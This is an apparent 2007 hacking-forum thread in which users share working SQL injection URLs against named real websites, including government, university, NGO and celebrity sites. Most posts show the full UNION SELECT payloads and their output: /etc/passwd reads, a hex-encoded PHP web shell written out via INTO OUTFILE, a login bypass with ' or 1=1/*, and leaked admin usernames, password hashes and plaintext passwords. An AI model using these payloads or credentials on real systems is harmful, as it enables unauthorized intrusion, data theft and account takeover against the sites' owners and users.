SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. banned

    www.contagem.mg.gov.br
    version, database, user
    Code:
    http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(concat_ws(0x3b,user(),database(),version())+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
    
    etc/passwd
    Code:
    http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(LOAD_FILE(0x2f6574632f706173737764)+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
    shell
    Code:
    http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(0x3c3f7068702073797374656d28245f4745545b636d645d293b203f3e+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+mysql.user+into_outfile+/*
    www.zjda.gov.cn
    Code:
    http://www.zjda.gov.cn/misc.php?xname=CP0GHU0&dname=FM01G11&xpos=1'+union+select+concat_ws(0x3b,user(),database(),version())/*&op=recommend
     
    #2461 banned, 10 Jun 2007
    Last edited: 10 Jun 2007
  2. Spyder

    education.apple.com
    admin:*4ACFE3202A5FF5CF467898FC58AAB1D615029441:%
     
    1 person likes this.
  3. _Pantera_

    Code:
    http://www.toraks.org.tr/journal/text.php3?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+articles/*
    Code:
    http://www.tutak.bel.tr/index2.php?id=-2+union+select+1,2,3,concat(user,char(58),pass),5+from+user+limit+0,1/*
     
    #2463 _Pantera_, 10 Jun 2007
    Last edited: 10 Jun 2007
  4. NOmeR1

    Too lazy to go further :)
     
    1 person likes this.
  5. Пчел

    Alcohol portal of the State Alcohol Inspectorate of the Republic of Tatarstan

    Code:
    http://www.tatalc.ru/index.php?page=7&idnews=-12345+union+select+1,2,3,4,5,concat(name,char(58),passwd),7,8,   9,10,11,12,13,14,15,16,17,18+from+users+limit+0,1/*  
    USER: root@localhost
    DATABASE: tatalc
    VERSION: 4.0.24

    Passwords are in plain text :)
    Администратор:N58y0Aa
     
    1 person likes this.
  6. Серенький

    sql

    http://www.stplus.ru/
    mysql 5
    admins : id_admin,login,password,name
    avk : adafff23fe27d62fa9d5220cc0b3a8ea : assassin
    a_volkov : 00a809937eddc44521da9521269e75c6 : emma
     
    1 person likes this.
  7. Пчел

    Some singer's website.

    Code:
    http://www.alesya.by/interview.php?act=intview&int=-123456+union+select+1,2,3,4,3/*
    USER: syabry@localhost
    DATABASE: syabry_xmb1
    VERSION: 4.1.21-standard


    KARELIAN REGIONAL PUBLIC ENVIRONMENTAL ORGANIZATION

    Code:
    http://spok.onego.ru/index.php?lang=en&page=show.php&id=-12345+union+select+1,2,3,4,5,6,7,8,9,table_name,11,12,13,14+from+INFORMATION_SCHE  MA.TABLES+limit+0,1/*
    USER: [email protected]
    DATABASE: spok_office_db
    VERSION: 5.0.37
     
    3 people like this.
  8. gormet

    _http://www.mediaclub.kz/news.php?catid=-1+union+select+1,database(),3/*

    _http://www.db-central.de/content_manager/page.php?ID=-1+union+select+1,2,3,4,5,6,7/*
     
  9. banned

    www2.tccgc.gov.tw
    version(), user(), database()
    Code:
    http://www2.tccgc.gov.tw/art/community_person.php?id=-1+union+select+1,user(),database(),4,LOAD_FILE(0x2f6574632f706173737764),version(),7,8,9,10,11,12,13,14,15+from+mysql.user/*
    The site runs on Windows under an ordinary user....
    There is access to mysql.user
    Go root it
     
  10. Серенький

    sql

    Comedy Club

    http://www.rucomedy.com/

    vulnerability: http://www.rucomedy.com/search.php?showid=1&serie=90'

    -> mysql 5
    output without a limit; I had a look, the most interesting tables are wp_users and users

    -> tables and columns:
    wp_users
     
    3 people like this.
  11. KPOT_f!nd

    Code:
    http://www.rareconservation.org/news/article.php?id=-14+union+select+1,2,user(),4,concat(version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18+from+news/*
    Code:
    http://www.americanforests.org/news/display.php?id=-167+union+select+1,2,user,4,password,6,7+from+mysql.user/*
    root:*236FB56946627F45C458B3434306F66D085BAF25
    liveweb:*9A15CDAE497B891F892D82CC25C89CB34CF519CC
    adminweb:*160CC77703CF91DE69921040D35F94E46B897CB3
    conference:*7769CBE36C25AA869D42E707102C5DBB94816511


    Code:
    http://www.everson.org/news/article.php?id=-22+union+select+1,2,password,username+from+users/*
    evers0n:z5Acrour

    Code:
    http://www.glaad.org/media/resource_kit_detail.php?id=-3495+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*
    Code:
    http://www.selfservice.org/article.php?id=-1887+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3,4,5,6,7/*
    the following tables exist: newsletter/members
     
    5 people like this.
  12. _Pantera_

    chat.chat_admin
    Code:
    http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(login,char(58),password,char(58),name,char(58),email),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+chat.chat_admin/*
    onder.isik:3a90d4fe673f875337e06cf2b83051e1 - onder
    mahir.hava:307b9b5e9a0ecd6437ddd389eb1c7396 - mahir

    mysql.user
    Code:
    http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,char(58),password),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+mysql.user/*
    root:57eeeb520498a5cb - 123321

    kobifinans_faz3.member
    Code:
    http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(nick,char(58),pass),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+kobifinans_faz3.member/*
    kobifinans_faz3.user
    Code:
    http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,char(58),pass),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+kobifinans_faz3.user/*
    fib_2_old.member
    Code:
    http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(nick,char(58),pass),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+fib_2_old.member/*
    fib_2_old.user
    Code:
    http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,char(58),pass),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+fib_2_old.user/*
    _____________________

    here's another edu one, but there is no users table(
    Code:
    http://www.metinberber.ktu.edu.tr/tanitim.php?id=-2+union+select+1,2,3,4,5,6/*
     
    #2472 _Pantera_, 11 Jun 2007
    Last edited: 11 Jun 2007
    2 people like this.
  13. netadmin

    Well, I found an SQL error on the Georgian site Top.ge
    http://top.ge/stat_ip.php?ID='
    but I just can't get SQL commands to execute, please help
     
  14. alextoun

    one sec

    it's closed off with htaccess)
     
    #2474 alextoun, 11 Jun 2007
    Last edited: 11 Jun 2007
    2 people like this.
  15. Серенький

    sql

    Natalie Portman

    http://www.natalieportman.com/

    vulnerability: http://www.natalieportman.com/npcom.php?page_number=149&newsid=1904'

    -> we check the version, it turns out to be 4. [email protected] : 4.1.20 : natcom (user(),version(),database())
    We try to guess the table names, but nothing fits; there is a phpbb forum, but we can't guess the prefix either. However, there is access to the tables of the mysql database:
    admin:536b46077018e797:localhost
    -> we look in the db table and see that there are databases horde, phpmyadmin_6w2sCLlPLlk, sitebuilder3. In the sitebuilder3 database we manage to guess the users table and the fields we need, user_name, user_password, email; and we find the record
    1:admin:21232f297a57a5a743894a0e4a801fc3
    the password is very complex, but we crack it - the password is admin ))

    we go to the admin panel
    the login/pass, of course, don't work, but due to the lack of proper filtering we get in without trouble by entering in the login field
    ' or 1=1/* and an arbitrary value in the password field.
     
    3 people like this.
  16. Constantine

    Democracy, Russian style. I cried -\
    Code:
    http://www.democracy.ru/article.php?id=247777+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,user(),version(),database()),16/*
    5.x branch
    Code:
    http://termini.lza.lv/article.php?id=9999999+union+select+1,concat(name,char(58),pass),concat_ws(char(58),version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users/*
     
    2 people like this.
  17. KPOT_f!nd

    Isis, check the anti-repost.. I already posted this..)))
    Code:
    http://www.peopleandplanet.net/section.php?section=-5+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),email,5+from+user/*
    there are e-mail addresses, might be useful to someone(
     
  18. KPOT_f!nd

    A. Lukyanchenko, official website of the Donetsk city mayor
    Code:
    http://lukyanchenko.dn.ua/view.php?id=-3187+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7,table_name,9,10+from+information_schema.tables/*&cat=1&subcat=0&type=1
    Institute of Mathematics, Economics and Mechanics of the I. I. Mechnikov Odessa National University
    Code:
    http://www.imem.odessa.ua/faculties.php?id=-2+union+select+1,passwd,name,4,5,6,email,8,9+from+users/*
    webmaster:&WЂчS/`wDvxч)Ѓжў
    [email protected]
     
    2 people like this.
  19. Ky3bMu4

    Code:
    http://www.grrn.org/releases/release.php?rid=78&id=6&rhid=-2+union+select+1,2,concat(user(),version())/*
    
    Found everything, worked it out, but can't get anything to output:
    Code:
    http://www.gsb.iastate.edu/projectsissues/news.php?id=-12+union+select+1,2,3,4,5/*
    http://www.lib.umich.edu/aael/news.php?newsID=-150+union+select+1/*
    
    I can't work these ones out:
    Code:
    http://www.emiclassics.co.uk/release.php?id=-160149+union+select+1/*
    - tried up to and including 102 columns (really wanted to break it :D ).


    Code:
    http://www.scotlandoffice.gov.uk/our-communications/release.php?id=-3565+union+select+1/*
    - up to and including 41.
     
    #2479 Ky3bMu4, 12 Jun 2007
    Last edited: 12 Jun 2007
  20. iv.

    Just started learning sql-inj, my first two trivial injections:
    Code:
    http://opticalnet.ru/articles.phtml?id=-1%20union%20select%201,2,3,4,5/*
    version: MySQL 5.0.33
    database: opticalnet
    user: root@localhost (hehe)
    Code:
    http://gsl.ru/offshore/list.phtml?cat=-1%20union%20select%201,2,3,4,5/*
    version: MySQL 4.0.24-log
    user: [email protected]
    database: tgsl
     
    3 people like this.